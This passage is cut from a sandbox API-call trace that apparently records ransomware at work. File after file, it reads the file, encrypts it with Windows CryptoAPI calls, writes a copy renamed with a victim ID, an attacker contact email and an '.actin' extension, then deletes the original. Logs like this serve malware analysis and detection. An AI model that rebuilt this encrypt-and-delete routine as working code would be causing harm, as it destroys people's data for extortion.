lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x2d210, lpOverlapped=0x0) returned 1 [0054.533] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71ac0) returned 1 [0054.533] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0054.533] CryptEncrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0054.533] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0054.533] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0054.533] CryptDestroyKey (hKey=0xf71e80) returned 1 [0054.533] CloseHandle (hObject=0x338) returned 1 [0054.534] CloseHandle (hObject=0x330) returned 1 [0054.537] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 1 [0054.539] SetEvent (hEvent=0x2e8) returned 1 [0054.539] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0054.539] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0054.540] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=94720) returned 1 [0054.540] CloseHandle (hObject=0x330) returned 1 [0054.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 0x80 [0054.540] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0054.540] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0054.540] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0054.540] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0054.540] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0054.540] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71cc0) returned 1 [0054.540] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0054.540] ReadFile (in: hFile=0x330, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x17200, lpOverlapped=0x0) returned 1 [0055.044] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x17210, dwBufLen=0x17210 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x17210) returned 1 [0055.044] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x17210, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x17210, lpOverlapped=0x0) returned 1 [0055.047] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71ac0) returned 1 [0055.047] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0055.047] CryptEncrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0055.047] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0055.047] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0055.047] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0055.047] CloseHandle (hObject=0x330) returned 1 [0055.047] CloseHandle (hObject=0x338) returned 1 [0055.049] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 1 [0055.051] SetEvent (hEvent=0x2e8) returned 1 [0055.051] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0055.051] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0055.053] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=78152) returned 1 [0055.053] CloseHandle (hObject=0x338) returned 1 [0055.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 0x80 [0055.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setup.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0055.053] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0055.053] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0055.053] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0055.053] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setup.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0055.053] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71fc0) returned 1 [0055.053] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0055.053] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x13148, lpOverlapped=0x0) returned 1 [0055.055] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x13150, dwBufLen=0x13150 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x13150) returned 1 [0055.055] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x13150, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x13150, lpOverlapped=0x0) returned 1 [0055.057] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0055.057] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0055.057] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0055.057] CryptDestroyKey (hKey=0xf71b40) returned 1 [0055.057] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0055.058] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0055.058] CloseHandle (hObject=0x338) returned 1 [0055.058] CloseHandle (hObject=0x330) returned 1 [0055.059] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 1 [0055.061] SetEvent (hEvent=0x2e8) returned 1 [0055.061] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0055.061] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0055.061] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=807256) returned 1 [0055.061] CloseHandle (hObject=0x330) returned 1 [0055.061] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 0x80 [0055.062] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0055.062] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0055.062] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0055.062] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0055.062] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.147] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72040) returned 1 [0056.147] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.147] ReadFile (in: hFile=0x330, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xc5158, lpOverlapped=0x0) returned 1 [0056.156] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xc5160, dwBufLen=0xc5160 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xc5160) returned 1 [0056.157] WriteFile (in: hFile=0x344, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xc5160, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xc5160, lpOverlapped=0x0) returned 1 [0056.175] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e40) returned 1 [0056.175] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.175] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0056.175] CryptDestroyKey (hKey=0xf71e40) returned 1 [0056.175] WriteFile (in: hFile=0x344, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0056.175] CryptDestroyKey (hKey=0xf72040) returned 1 [0056.175] CloseHandle (hObject=0x330) returned 1 [0056.175] CloseHandle (hObject=0x344) returned 1 [0056.539] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 1 [0056.546] SetEvent (hEvent=0x2e8) returned 1 [0056.546] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0056.546] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.546] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=144416) returned 1 [0056.546] CloseHandle (hObject=0x344) returned 1 [0056.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 0x80 [0056.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.547] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.547] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0056.547] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0056.547] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.547] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf720c0) returned 1 [0056.547] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.547] ReadFile (in: hFile=0x344, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x23420, lpOverlapped=0x0) returned 1 [0056.549] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x23430, dwBufLen=0x23430 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x23430) returned 1 [0056.549] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x23430, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x23430, lpOverlapped=0x0) returned 1 [0056.552] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71a80) returned 1 [0056.552] CryptSetKeyParam (hKey=0xf71a80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.552] CryptEncrypt (in: hKey=0xf71a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0056.552] CryptDestroyKey (hKey=0xf71a80) returned 1 [0056.552] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0056.552] CryptDestroyKey (hKey=0xf720c0) returned 1 [0056.552] CloseHandle (hObject=0x344) returned 1 [0056.552] CloseHandle (hObject=0x324) returned 1 [0056.556] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 1 [0056.557] SetEvent (hEvent=0x2e8) returned 1 [0056.557] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0056.557] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.557] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=14084) returned 1 [0056.557] CloseHandle (hObject=0x324) returned 1 [0056.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 0x80 [0056.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\strings.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.558] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.558] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0056.558] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0056.558] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\strings.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.558] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71b80) returned 1 [0056.558] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.558] ReadFile (in: hFile=0x324, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x3704, lpOverlapped=0x0) returned 1 [0056.559] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x3710, dwBufLen=0x3710 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x3710) returned 1 [0056.560] WriteFile (in: hFile=0x344, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x3710, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x3710, lpOverlapped=0x0) returned 1 [0056.561] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d40) returned 1 [0056.561] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.561] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0056.561] CryptDestroyKey (hKey=0xf71d40) returned 1 [0056.561] WriteFile (in: hFile=0x344, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0056.561] CryptDestroyKey (hKey=0xf71b80) returned 1 [0056.561] CloseHandle (hObject=0x324) returned 1 [0056.561] CloseHandle (hObject=0x344) returned 1 [0056.562] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 1 [0056.563] SetEvent (hEvent=0x2e8) returned 1 [0056.563] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0056.563] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.563] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=38898) returned 1 [0056.563] CloseHandle (hObject=0x344) returned 1 [0056.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 0x80 [0056.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.563] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.563] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0056.563] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0056.563] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.563] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72180) returned 1 [0056.563] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0056.564] ReadFile (in: hFile=0x344, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x97f2, lpOverlapped=0x0) returned 1 [0056.565] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x9800, dwBufLen=0x9800 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x9800) returned 1 [0056.565] WriteFile (in: hFile=0x324, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x9800, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x9800, lpOverlapped=0x0) returned 1 [0056.566] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71ec0) returned 1 [0056.566] 